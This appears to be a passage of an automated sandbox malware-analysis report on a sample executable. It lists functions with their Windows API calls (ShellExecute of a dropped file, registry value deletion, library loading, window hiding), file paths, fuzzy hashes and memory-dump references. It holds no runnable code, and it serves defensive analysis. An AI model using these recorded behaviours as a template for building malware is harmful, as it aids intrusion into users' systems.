Instruction ID: 95a73edef03a3fe4ea7fa24255aadd7873cdb690117aa2712c5123595e980fc6
Opcode Fuzzy Hash: ecb533084f054dec527d8ee4002c22eb7271b0964ed621fa894de998c2c2fbf7
Instruction Fuzzy Hash: F2E02B31108A9197C21067349D0CB5F6AD5EFC6314F044A36F991F31C1C73858069EBE

Function 00401E59 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme,?), ref: 00401E9F

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme, xrefs: 00401E8A

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Brudgomme
API String ID: 587946157-139713324
Opcode ID: 62972551e4f607768522ca5215d0e9555a819d9815caab0e71c71de7bb35adcf
Instruction ID: 7c51c884e7587c3efeb31cb3e5c9943a81f4090218bfe93557c80408bc49aec8
Opcode Fuzzy Hash: 62972551e4f607768522ca5215d0e9555a819d9815caab0e71c71de7bb35adcf
Instruction Fuzzy Hash: 58F0F671B14104BADB21ABB59F4AE6D2AA5DB81318F38043BF050F71C2D9FD8942DB28

Function 100027E8 Relevance: 3.2, APIs: 2, Instructions: 156COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00000000), ref: 100028A7
GetLastError.KERNEL32 ref: 100029AE

Memory Dump Source

Source File: 00000000.00000002.2307798109.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2307780207.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307816109.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2307831493.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_ODjwCjQBAP.jbxd

Similarity

API ID: EnumErrorLastWindows
String ID:
API String ID: 14984897-0
Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95

Function 00402483 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,00000494,00000000,00000022,00000000,?,?), ref: 00402C00

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B3
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 842ccded7b04f1c996c394db29755cab0eaefbc32d4fd585d2de1ae204d8f70a
Instruction ID: 85d806923b24475f53c36965a20abc0d18f92dd5d526b72c5aa3047674b5102d
Opcode Fuzzy Hash: 842ccded7b04f1c996c394db29755cab0eaefbc32d4fd585d2de1ae204d8f70a
Instruction Fuzzy Hash: 7611C171A04205FFDB20CF60CA985AEBBB4AF00359F20443FE142B72C0D2B84A85DB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
Instruction ID: 8ec6bfb8ef4f3ff43576048fe9568e939b5e998f238dec90285f5c94a9fc96e2
Opcode Fuzzy Hash: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
Instruction Fuzzy Hash: 2201F431B24210ABE7294B389E04B6A36A8F710314F11823BF911F66F1D7B8DC029B4D

Function 00402377 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,00000494,00000000,00000022,00000000,?,?), ref: 00402C00

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402396
RegCloseKey.ADVAPI32(00000000), ref: 0040239F

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: ce34e0a5a3cad0306182936bac4226b47a4e95e33cdd8971417c4bf24fbf648c
Instruction ID: 7cc126104223fee90c4482272470a44d0e33bb4baa6becb9c0b30a5ba769ccb5
Opcode Fuzzy Hash: ce34e0a5a3cad0306182936bac4226b47a4e95e33cdd8971417c4bf24fbf648c
Instruction Fuzzy Hash: 25F0A472A00111ABD720AFA09A8E9BE76B89B40344F24043BF201B71C0D5BD5D028769

Function 00402590 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004025B1

Strings

C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll, xrefs: 004025A2, 004025C7

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsv6CC6.tmp\System.dll
API String ID: 1659193697-2487562424
Opcode ID: 9108d4ceed508d8a02313cc574e378f3b7a987aa5820872456f395d40ec67233
Instruction ID: 2bf8431ce51e6c58f43ec2947d6bdc143d6e81ddf8616a76c722d5425931f27b
Opcode Fuzzy Hash: 9108d4ceed508d8a02313cc574e378f3b7a987aa5820872456f395d40ec67233
Instruction Fuzzy Hash: 82F0E272A08244BACB20FBB55E4AA9F6AA4CBC1314B34403FF141B71C2C6BC4542DA2D

Function 00401E25 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E43
EnableWindow.USER32(00000000,00000000), ref: 00401E4E

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 36dcea6e1d224af34142dbcc53fa3142b8bf20b1b5b4f1e3402a8bbf529d307d
Instruction ID: 6bc854546bde8c1d97c50108fc272036e6fafce41083740c3c393c21766323e0
Opcode Fuzzy Hash: 36dcea6e1d224af34142dbcc53fa3142b8bf20b1b5b4f1e3402a8bbf529d307d
Instruction Fuzzy Hash: 2BE012B2B08211BFEB14EFB4E9895AE7BB4EF40325B20403BE401F11D1D67D59419B59

Function 0040156F Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000), ref: 00401581
ShowWindow.USER32(00010462), ref: 00401596

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 17699a1f730cc25233c13bc64813f1e04f0aaa057b5d2da36e90e35cf9de59ca
Instruction ID: 1fba713723e617fd63a9d4476e2d2033a2576266d828a69d52802257caf8ad67
Opcode Fuzzy Hash: 17699a1f730cc25233c13bc64813f1e04f0aaa057b5d2da36e90e35cf9de59ca
Instruction Fuzzy Hash: 42E086B6B00115BBCB24DF64EE9087E77B6E784320750043FD502B3290C2B69D429B58

Function 00406290 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403329,00000009), ref: 004062A2
GetProcAddress.KERNEL32(00000000,?), ref: 004062BD

Part of subcall function 00406222: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406239
Part of subcall function 00406222: wsprintfA.USER32 ref: 00406272
Part of subcall function 00406222: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406286

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 3d400e748f947671e30b9badb510484ff95b6787d133025eb2c4a7967b05848e
Instruction ID: 9986063a3a3a914c3c9c85809e338cef1f66889ba2e3f6f8a6abe9a53671474f
Opcode Fuzzy Hash: 3d400e748f947671e30b9badb510484ff95b6787d133025eb2c4a7967b05848e
Instruction Fuzzy Hash: BAE0CD32A08111B7D650B7705D0497773AC9FC475030208BEF907F2185E738EC319769

Function 00405B6A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402D8D,C:\Users\user\Desktop\ODjwCjQBAP.exe,80000000,00000003), ref: 00405B6E
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B90

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
Instruction ID: 2e597581bf20324382b204af2e2b9293bc3b27f4d9e8cb915424ec39c2be7a6e
Opcode Fuzzy Hash: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
Instruction Fuzzy Hash: A7D09E31658201EFFF098F20DD16F2EBBA2EB84B00F10962CBA92941E0D6755815DB26

Function 00405B45 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,0040575D,?,?,00000000,00405940,?,?,?,?), ref: 00405B4A
SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B5E

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction ID: 899457fb2a373ec916eabf998b05f3716e4ca5246c779d0db29ba2cd27af7bf6
Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction Fuzzy Hash: E2D01272908521AFC6102738ED0C89BBF65EB543717058B31FDB9E22F0D7345C528AA9

Function 00405653 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004032B2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 00405659
GetLastError.KERNEL32 ref: 00405667

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
Instruction ID: 0da22567c4b446b4f42a21ca14333010da7ca755278e2de90fea66cf95c641d8
Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
Instruction Fuzzy Hash: 80C04C30A19502DAD7105B31DD08F177E60EB50741F548935A10AE11F0D6769451DD3F

Function 004025D7 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: ba0784285b27e5103b764f78ef6fb10791d77067d667a4e03e7b1a8b22abeba3
Instruction ID: c506eed3d8509f523d62ce86bbd7ec2d7c700efff23c78fc82727488f7f797df
Opcode Fuzzy Hash: ba0784285b27e5103b764f78ef6fb10791d77067d667a4e03e7b1a8b22abeba3
Instruction Fuzzy Hash: 5A21F970D0429ABADF218FA885486AEBF749F01314F1445BFE890B63D1C1BE8A81CF59

Function 0040166A Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(00000000,00000000), ref: 00401685

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 6a883f9504f5c2888ca71b0d8159a7984c3ca00eae0cacb2c6aae2654bc04831
Instruction ID: 5898f67605d89fe4fb30f7e570565f9f0960a3a70fe6e37fe1d860f2248c6c53
Opcode Fuzzy Hash: 6a883f9504f5c2888ca71b0d8159a7984c3ca00eae0cacb2c6aae2654bc04831
Instruction Fuzzy Hash: 2AF09635B08115A6DB20A7A54F0DD5F15649B81364B34423BF151B21D1DABD860295AF

Function 004022F2 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232B

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 6b5e48cc008279052f1a47b51cc32cf127a00dc2733201354761e156b3ebbbdf
Instruction ID: 5f6267e841dd840bf6295cbe1617e7a0042591bb1814ca2e8a4844537e2a2c78
Opcode Fuzzy Hash: 6b5e48cc008279052f1a47b51cc32cf127a00dc2733201354761e156b3ebbbdf
Instruction Fuzzy Hash: 67E04F31B001246BD7307AB10F8E97F10999BC4304B39153ABA01B62C6EDBC4C414AB9

Function 00405C11 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004120D1,0040A8D8,004031F8,0040A8D8,004120D1,004128D8,00004000,?,00000000,00403022,00000004), ref: 00405C25

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2303092873.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303121174.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303146398.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2303230941.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ODjwCjQBAP.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction ID: a68fbbb5dd244fa7f7e93bb3aa8c49248ed304819acaaafe9587b6e0b9a7c414
Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction Fuzzy Hash: 59E0EC3261835EAFEF209E659C00AEB7B6CEB05361F048836FD15E2150D271E8219BA9

Function 00402BD8 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,00000494,00000000,00000022,00000000,?,?), ref: 00402C00

Memory Dump Source

Source File: 00000000.00000002.2303106650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

